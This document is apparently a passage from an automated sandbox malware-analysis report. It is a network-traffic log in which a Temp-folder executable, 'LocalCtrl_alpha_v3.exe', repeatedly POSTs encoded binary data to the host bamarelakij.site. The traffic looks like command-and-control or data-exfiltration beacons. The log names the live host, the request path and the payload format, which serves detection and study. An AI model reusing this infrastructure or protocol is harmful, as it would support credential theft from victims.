                                                                                                                                                                                                                                                                          2025-01-09 13:56:02 UTC15331OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 21 17 0a 00 58 04 ce 1c 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 16 06 00 00 b0 08 9d 38 00 00 00 00 27 81 21 25 31 81 21 4d 86 d0 e4 de da ca b3 6a 86 74 b8 aa e6 ca e4 e6 b8 d0 ea c4 ca e4 e8 b8 82 e0 e0 88 c2 e8 c2 b8 98 de c6 c2 d8 b8 8e de de ce d8 ca b8 86 d0 e4 de da ca b8 aa e6 ca e4 40 88 c2 e8 c2 23 33 81 21 4f 88 ca cc c2 ea d8 e8 b3 7a 86 74 b8 aa e6 ca e4 e6 b8 d0 ea c4 ca e4 e8 b8 82 e0 e0 88 c2 e8 c2 b8 98 de c6 c2 d8 b8 8e de de ce d8 ca b8 86 d0 e4 de da ca b8 aa e6 ca e4 40 88 c2 e8 c2 b8 88 ca cc c2 ea d8 e8 b3 68 c6 d0 e4 de da d2 ea da be c4 e4 de ee e6 ca e4 e6 b8 86 d0 e4 de da ca b8 e0 e4 de cc d2 d8 ca e6 b8 88 ca cc c2 ea d8 e8 b8 98 de ce d2 dc 40 88 c2
                                                                                                                                                                                                                                                                          Data Ascii: !XG68'!%1!Mjt@#3!Ozt@h@
                                                                                                                                                                                                                                                                          2025-01-09 13:56:02 UTC15331OUTData Raw: a0 b4 84 a6 e4 ce 82 b0 f4 60 8c 96 d6 e0 ea dc 94 6a ea e0 6e aa e0 8a dc 9c da 9e 86 ea b2 9e f2 c6 e2 84 e4 94 96 56 da 8e ee b4 b4 a0 ee 9e 68 70 68 ca e6 8e ac 9a c2 56 88 60 66 82 60 66 94 a2 ec 9e f0 aa 92 da 84 c2 ac 90 e4 96 c4 c4 b2 84 64 aa d4 d0 8c 8e 84 cc c4 8e 60 94 90 82 66 d4 ce ce 96 e4 82 66 82 aa da 9e a2 ee de ea 68 8e c2 f4 84 72 f0 f4 ea e6 5e 70 6a 90 da 60 92 5e c4 ca 90 e8 a6 e8 68 9a de a6 ec a2 ee cc 9e f4 94 6a 56 96 a6 96 cc a6 a4 72 e8 b2 da f4 88 68 c2 ac e8 62 64 96 d8 ac c2 ca 70 86 e8 e8 ac 9e 9a 92 8a ac a2 6c 90 e2 e4 e6 a4 f4 6a d0 5e c6 ac d4 f2 c4 8c b2 9e 8e 56 a6 a2 d8 64 84 c6 90 68 9c 64 9e a6 f2 90 8e da 62 68 ae d0 66 e0 dc 9a 82 96 c4 ee f2 e0 e0 6e f4 e0 60 d2 d8 ae 6e ce 72 ac 92 86 9a 66 68 62 62 d2 8e 98
                                                                                                                                                                                                                                                                          Data Ascii: `jnVhphV`f`fd`ffhr^pj`^hjVrhbdplj^Vdhdbhfn`nrfhbb
                                                                                                                                                                                                                                                                          2025-01-09 13:56:02 UTC15331OUTData Raw: 9e a0 68 b4 56 8a 72 d4 ea e6 da 82 cc 86 86 b0 f4 a2 f4 c6 72 de 94 a2 d2 68 6c b4 62 6c 66 a2 8c c4 90 8a a4 96 d0 de c6 d0 a4 de a2 8c 72 72 ea a2 72 a2 70 92 6c 90 96 68 a8 a4 6e 96 98 a8 88 f2 f2 a8 66 6a ca 66 ce f2 ea 9e 8e d0 d0 98 ec a8 da ec ae de de 6c f4 60 aa a0 84 9e 70 84 6c ec 70 66 72 8c 94 6e 68 8c e2 72 66 8a aa 9a 94 8a d2 d0 84 ce de 70 f2 86 90 94 84 ce de 70 f0 86 a0 94 84 ce e4 e6 b4 84 92 aa ce ee a8 60 9a ce da 96 a2 68 9e 9a 9a ce e6 8a ce ee a6 c6 b2 84 96 aa ce ee a6 c6 b4 84 8a 9c 84 ce d6 56 6a 84 88 ec 84 d0 de 6c d2 9a d6 8e 96 ca 62 d6 aa d8 86 6e ec b2 62 8c a2 f2 ec ee 60 d2 68 98 a6 6a ec 60 e6 86 d6 e2 c8 88 6e 82 de 96 90 62 56 d0 d6 ac 84 96 cc a6 ec ae a4 a6 aa a4 d4 5e 98 de e2 84 aa 56 d4 d6 ae 84 c2 b0 a8 f4 f4
                                                                                                                                                                                                                                                                          Data Ascii: hVrrhlblfrrrplhnfjfl`plpfrnhrfpp`hVjlbnb`hj`nbV^V
                                                                                                                                                                                                                                                                          2025-01-09 13:56:02 UTC15331OUTData Raw: e2 d8 72 92 62 aa 6e cc dc d6 86 5e e4 9a e0 98 b2 64 aa f0 c6 8c 70 d8 84 c4 aa 6c ea ae b4 a2 a6 b4 e2 82 e4 72 a6 e0 c6 56 8e 86 90 90 90 a6 e0 a0 a2 ca ae 6a e2 a0 62 8a 82 98 ae 66 dc d0 ea 5e aa 84 da de 72 68 e2 68 70 e6 96 e6 64 86 e4 c4 72 86 6a b0 92 9a 62 f2 70 aa e0 ce ec cc c6 68 e4 84 ca e2 92 68 b2 c2 e4 c2 60 b0 96 e8 da a4 92 d8 66 ce 6c ec 90 cc a4 6c dc de c4 d6 62 da ac ee ca dc b4 f2 c6 a4 b4 d6 5e 66 64 cc aa d2 68 96 d4 a2 a8 68 ea aa 88 da ea ca aa ce e4 72 d8 8c f0 90 9e 9e 6e e6 86 8e 68 c6 72 da e8 d2 f4 d6 d0 64 a8 c2 f2 a0 d0 c4 e6 da 6a e6 b2 a8 6e 56 9e f0 e8 5e 96 e6 62 c6 e0 f0 a6 84 c6 56 ec b4 b0 e6 b2 ea a4 82 9e 96 d6 64 e2 60 e0 98 e4 d6 a0 f0 cc 84 9a 6a c2 84 a8 a0 5e 8a e2 a8 8a b2 f4 b0 6c 6e d2 d2 ec 82 c2 8a d6
                                                                                                                                                                                                                                                                          Data Ascii: rbn^dplrVjbf^rhhpdrjbphh`fllb^fdhhrnhrdjnV^bVd`j^ln
                                                                                                                                                                                                                                                                          2025-01-09 13:56:02 UTC15331OUTData Raw: a0 c8 ea a4 de 72 e6 d0 88 f4 86 6e 62 b2 92 64 72 ce 66 64 84 ea 6e 56 d4 b2 ea e4 9a ce b2 8e b0 c4 ea b2 ac d0 f0 56 70 d0 9e 56 66 c2 8e 8c a6 6e a2 c6 8e e6 90 ce f2 6c ac 6e f2 9e 6e 8c de ee d8 5e a2 b0 c8 ae 98 aa b0 92 e2 dc e2 e4 e4 6a 62 5e 9c 92 d4 d0 8c 82 a0 9a b4 62 d8 6c ec d2 d2 98 9e 82 8c e2 90 f4 d2 a8 92 f4 72 a2 5e 62 b4 d0 9e ec 5e 68 cc e0 5e ea a0 68 cc e4 ec 56 90 6c 5e 5e d0 56 dc 56 68 5e d0 56 ea 5e 68 cc e4 5e 56 90 6c cc 6e d4 56 90 6c 6e 5e d0 56 ec 5e 68 cc e0 5e ea a0 68 cc e4 ec 56 90 6c 5e 5e d0 56 dc 56 68 5e d0 56 ea 5e 68 cc e4 5e 56 90 6c cc 6e d4 56 ec ee dc ae 5e ee e8 e6 5e c8 72 ee 92 a6 e8 70 f0 60 6e f2 8e 8c 68 ee 82 96 b0 a2 90 de 84 96 90 e0 ec a8 8c 96 d6 f0 d8 d0 de f4 94 de 6c 8c a6 8e d6 b0 64 c6 6c 70
                                                                                                                                                                                                                                                                          Data Ascii: rnbdrfdnVVpVfnlnn^jb^blr^b^h^hVl^^VVh^V^h^VlnVln^V^h^hVl^^VVh^V^h^VlnV^^rp`nhldlp
                                                                                                                                                                                                                                                                          2025-01-09 13:56:02 UTC15331OUTData Raw: 88 a4 9e f0 e8 6c ae aa d6 8e 92 cc 66 d2 60 b2 a0 f0 5e cc 82 a4 f0 9a 64 84 9a c6 d4 88 56 c8 8c 9a a8 d2 96 d6 6e dc 86 b4 b0 5e e6 d6 88 9a 70 de e8 8c de d6 f2 de da 86 8a e4 d2 a2 6c 6a f4 aa aa 9c da 5e c4 88 68 de a4 94 90 8e 64 f4 de a0 c2 d4 84 c8 d4 98 9a 66 c4 6c a2 92 a4 d8 8a d2 e6 72 96 9e 90 c2 8a a8 6c c4 c6 c6 d2 a0 68 a8 e0 c6 c4 8a a6 9e 66 66 92 a4 ee f2 d2 94 9e 90 94 f0 ce 8a e0 72 8a d2 de ac e2 82 c2 5e 92 8c b4 94 b2 ec b2 de 64 dc 64 e2 9c 8e a4 aa 5e dc 66 8a 9c a6 70 ae d4 b2 de 8c 8e ce 60 a8 88 68 d2 ea e0 64 8e 90 f0 86 dc 70 a0 dc ec ae 98 ea d6 cc d0 84 ea 5e 86 d8 66 9c c8 9e 84 9e 8e 8e 56 f4 84 d0 f0 6e 9e d0 60 82 96 ce e4 6e ce d4 b4 ae a8 e0 e8 62 70 c4 da 9a ac 8a c8 86 9c ac c6 d4 96 c4 c2 f0 d0 ec 98 96 a2 e8 66
                                                                                                                                                                                                                                                                          Data Ascii: lf`^dVn^plj^hdflrlhffr^dd^fp`hdp^fVn`nbpf
                                                                                                                                                                                                                                                                          2025-01-09 13:56:02 UTC15331OUTData Raw: c4 ae c6 d4 ce cc ac 72 82 62 62 a6 98 60 e6 6c ce ae 68 9a ce ac 90 e0 9c 70 9a ca c6 60 c4 62 ec da 98 8a ce d2 de 96 ce 8c a6 a2 a2 84 c4 60 8a a6 ce f2 a4 90 92 d2 64 6c ca d4 8e e8 8a c8 e6 82 84 90 c6 60 da 6c 86 c8 a6 64 68 c6 86 d8 a6 72 a4 96 d0 f2 a0 86 de 64 94 e2 d2 a6 d2 62 f2 d0 da e0 e6 de ac 9c 82 b4 a4 ea a6 88 d2 f0 ac ea a0 f4 88 d6 da c6 9c 6a 90 b0 f0 84 c4 ac 66 a4 c6 96 b4 e6 a4 aa 9a d4 86 56 70 90 c2 98 82 e8 72 f2 ce 6c 6c ec 94 b0 84 6e e8 70 66 d8 9e e8 a4 9e 8c 68 72 d8 c8 84 96 e2 c6 82 de cc de d8 86 e0 a4 b0 ec 60 a4 a4 d2 e8 aa ec c6 c8 d0 f2 9a da f0 5e a8 94 90 de ac dc de f0 a4 ae 96 d6 8a b2 ce e0 8a de 70 e4 94 70 86 e8 90 60 96 88 d0 9e e0 d6 a6 56 ce ea ce c2 6c cc ac ac c4 a8 9e 86 f2 72 c2 64 e8 de cc 98 60 9e d4
                                                                                                                                                                                                                                                                          Data Ascii: rbb`lhp`b`dl`ldhrdbjfVprllnpfhr`^pp`Vlrd`
                                                                                                                                                                                                                                                                          2025-01-09 13:56:02 UTC15331OUTData Raw: 94 d0 d0 a4 66 da c2 66 aa ae 68 8e 90 f4 70 f0 8a a6 9e ec 68 ec dc 84 9e d6 8e ae 84 6a aa ea e2 72 c4 94 6a a0 e4 e4 b4 9e c8 e2 d4 c6 64 a2 f0 88 da a8 d4 88 66 64 a2 c2 ee ec 6c ca 6a b2 6a d8 9c d4 9a 86 c8 ca 6a f2 6a 66 64 dc b0 98 f4 f2 98 d0 e6 da a4 d0 ec a2 c6 64 6a a0 c6 64 90 6a ea 72 98 de b2 56 66 ea a4 a4 8a aa a6 8c aa dc aa ea d2 b0 e2 96 9c e8 98 8a 9a 70 9c ec c8 98 e6 d2 72 b4 5e 64 ca cc e4 ca 90 f0 56 ea d0 72 c2 64 b2 6a 90 d6 c4 a0 6a b0 ce 88 cc 66 f0 5e f0 cc c6 a8 66 da 70 d4 66 e4 64 aa ca 6c 86 ac d2 e6 e0 d8 9a 68 c4 da b4 dc a2 cc 56 62 5e 9a ec f0 a8 b4 8c da b2 70 f2 9a f4 72 ce 6a dc f4 8a f4 84 8a f4 c4 f2 92 f4 5e 72 da 60 6a 5e 8c de d4 6a dc cc 70 e8 6c b0 b2 d0 8e dc a4 b4 f2 64 d2 b4 ee 64 e2 e8 c2 8a ce ac e4 c4
                                                                                                                                                                                                                                                                          Data Ascii: ffhphjrjdfdljjjjfddjdjrVfpr^dVrdjjf^fpfdlhVb^prj^r`j^jpldd
                                                                                                                                                                                                                                                                          2025-01-09 13:56:02 UTC15331OUTData Raw: 86 f2 a8 88 d2 a2 98 86 84 84 9c 9e 88 c6 a2 a6 88 a8 9a a2 cc ea 86 9c c4 96 98 82 b0 a2 b0 56 9e 9a 92 8c d2 94 c8 d0 cc d0 a4 68 e2 96 de 9a 60 a4 ac a6 da 82 ae d2 9c d8 60 ee 88 88 9e cc 92 70 68 9a 64 a4 ac 84 a2 94 ca 88 86 b2 b4 ae f4 f2 ce d2 e8 96 a6 d6 b4 c8 82 a2 a0 d2 de 6c c2 a8 dc 8a a6 92 d0 e8 ca b0 ce ec da 84 c2 6c ce e4 e8 6a 84 9c 68 d2 cc 88 ca 68 a4 e2 d6 c6 62 84 e8 68 82 c6 e0 a8 aa c6 82 66 9a 9c ee 86 b2 dc c4 92 dc da 8a 92 9a d0 a2 6e c4 96 9a 8e 84 86 d2 e0 90 94 8a 8c 9e 8e b4 ce c2 dc d4 e2 9a d8 8e 9c c6 8c ea ce 82 d4 ae f2 c4 c6 9a 84 b0 66 d6 ac 5e 86 6c da c6 d4 d6 94 dc ce 62 60 a8 84 c2 84 92 ac f0 5e da 8e 84 c8 62 e2 84 c6 e6 94 f0 c6 a0 ce 9a 98 de e0 8c ac 82 de 70 6a e6 d0 aa 8e ae ee b0 b0 88 72 b2 8e a8 e4 9e
                                                                                                                                                                                                                                                                          Data Ascii: Vh``phdlljhhbhfnf^lb`^bpjr
                                                                                                                                                                                                                                                                          2025-01-09 13:56:02 UTC15331OUTData Raw: 9c d6 96 62 d8 b4 9a 9c a6 e4 f4 6a 9c a8 d4 f4 f4 a6 a0 72 6c 56 56 9a e2 a8 82 b4 6c c6 ea b0 88 94 d8 c4 e6 e8 e8 b0 b4 a0 d0 de 8a ec 98 b0 9a a0 94 d4 9a da 88 82 64 96 66 e4 9e a2 82 ca da e0 60 ca 6a 9a 90 92 ec d2 e6 82 e2 a8 e6 ae b4 d0 62 d8 5e 68 f2 66 e2 a0 ea 86 64 66 ae 64 62 6c a6 f0 c8 ce f4 dc cc 9e 88 9c 56 f0 e2 d4 5e ca 6c 96 70 cc 8e ae 6c 8a a8 c8 f2 ce a0 84 f4 b4 9c c8 ec 88 6e e0 de f0 a0 ac 64 9c 5e aa f4 a8 ac 92 64 8a 5e aa f4 d4 d4 90 90 d0 56 94 8a d4 6e e2 a0 9a a6 d8 98 62 d6 c8 b2 b4 68 66 d4 e6 ce d2 8a f4 ea a0 a2 ac a0 82 b2 60 b2 a2 ae a0 a4 b4 ca 56 ce d0 cc 84 8c 6e 9e 86 f0 70 86 aa 6e 70 c4 e6 94 ac e0 da f0 6e 88 8a a4 ac 64 96 f0 ec d8 ec dc f0 d6 ae 82 d4 f2 f0 cc 9e a8 f0 9a 60 6c 6a 64 8c e0 e0 d6 66 de a2 6a
                                                                                                                                                                                                                                                                          Data Ascii: bjrlVVldf`jb^hfdfdblV^lplnd^d^Vnbhf`Vnpnpnd`ljdfj
                                                                                                                                                                                                                                                                          2025-01-09 13:56:04 UTC767INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:04 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          pid: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VCxN4bgMnx11R0cRoVplK4jgH3mUQTto5bT9s93HhYO6FX%2F201tDYdB8H8%2B%2B3oJ0lLIG1E5yIX3pvpMotwNFpAFPBEaOxaXj8XES4JsXfTHc9CLmxlka9ritQWlUSMHHD66d"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4edafbf4343d4-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1711&min_rtt=1590&rtt_var=838&sent=225&recv=688&lost=0&retrans=0&sent_bytes=2837&recv_bytes=686212&delivery_rate=1140625&cwnd=224&unsent_bytes=0&cid=b0b96b5f03e0dd2a&ts=1532&x=0"


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          21192.168.2.850036104.21.80.524436712C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:56:04 UTC386OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 745
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
                                                                                                                                                                                                                                                                          2025-01-09 13:56:04 UTC745OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 95 00 00 00 c0 48 22 25 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 06 00 00 00 81 90 44 4a 00 00 00 00 25 81 21 00 00 00 00 c4 00 00 00 81 90 44 4a 00 00 00 00 a0 96 0c 0c 58 00 00 00 00 00 00 00 5a 00 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 96 0c 0e 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 a0 96 0a 0c 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0f 00 00 00 a7 00 00 00 84 03 ce 1a 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 2a 00 00 00 09 06 9d 34 00 00 00 00 25 81 25 2b 81 04 02 47 25 81 00 41 2b 81 02 02 47 25 81 00 41 00 00
                                                                                                                                                                                                                                                                          Data Ascii: H"%G6DJ%!DJXZZG6*4%%+G%A+G%A
                                                                                                                                                                                                                                                                          2025-01-09 13:56:05 UTC758INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:05 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          pid: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fubob8bQLiNviSliG4HAlArkrRufzILnUIUZAzK6erh41bIXFOz1py8yRjH9ju0%2B4FtzWjVJTRD%2FtyvjztY5HXFA6KLpROcdkgg7b76I77IuujVbyZfSWJpPBZ3LAoIgMj15"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4edbb6874726b-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1802&rtt_var=693&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1767&delivery_rate=1559829&cwnd=238&unsent_bytes=0&cid=1804536e24905d2f&ts=326&x=0"


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          22192.168.2.850042104.21.80.524436712C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:56:05 UTC386OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 212
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
                                                                                                                                                                                                                                                                          2025-01-09 13:56:05 UTC212OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 99 00 00 00 70 0b 5f 20 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 0e 00 00 00 e0 16 be 40 00 00 00 00 27 81 81 25 81 23 00 00 00 00 00 c4 00 00 00 e0 16 be 40 00 00 00 00 a0 96 0c 0c 58 00 00 00 00 00 00 00 5a 00 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 96 0c 0e 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 a0 96 0a 0c 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                          Data Ascii: p_ G6@'%#@XZZ
                                                                                                                                                                                                                                                                          2025-01-09 13:56:06 UTC757INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:06 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          pid: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IUTZKsm6scmXt8vAEsfml2YnZLCVPXgZcrpG9UpGaTjQ6LPEov2BicfRfYHWvDY7lBpd1Fi58uPEbr1p0qE3zHjtPNt8viUMXSnAAZZaa54jnSzTWIR3WL0Tm9Bo4U9Zif99"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4edc139e71a44-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=65754&min_rtt=1920&rtt_var=38546&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1234&delivery_rate=1520833&cwnd=131&unsent_bytes=0&cid=fe63e1cc0059bbd7&ts=349&x=0"


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          23192.168.2.850049104.21.80.524436712C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:56:06 UTC386OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 380
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
                                                                                                                                                                                                                                                                          2025-01-09 13:56:06 UTC380OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 95 00 00 00 1e 5a f7 29 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 06 00 00 00 3c b4 ef 52 00 00 00 00 25 81 21 00 00 00 00 c4 00 00 00 3c b4 ef 52 00 00 00 00 a0 96 0c 0c 58 00 00 00 00 00 00 00 5a 00 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 96 0c 0e 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 a0 96 0a 0c 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0f 00 00 00 94 00 00 00 13 6a 2a 23 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 04 00 00 00 26 d4 54 46 00 00 00 00 23 21 00 00 00 00 c4 00 00 00 26 d4 54 46 00 00 00 00 a0 96 0c 0c 58
                                                                                                                                                                                                                                                                          Data Ascii: Z)G6<R%!<RXZZj*#G6&TF#!&TFX
                                                                                                                                                                                                                                                                          2025-01-09 13:56:07 UTC758INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:07 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          pid: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7CTl2RwPZn16XrFhceiV8tXdzI9Ipw4oKeWvZ8iy8LU1L0qXREiEMlm6f4hw72fRp4e8lJkQDK%2BJvu9lc4Lsn30wHydBg9rpDK7bi7nxxQl5PeIFsJJJ2I2C%2FV5xkzloL2WH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4edc74e0f8c71-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1874&min_rtt=1846&rtt_var=712&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1402&delivery_rate=1581798&cwnd=193&unsent_bytes=0&cid=36dd47a7aba43956&ts=424&x=0"


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          24192.168.2.850060104.21.80.524436712C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:56:08 UTC388OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 14825
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
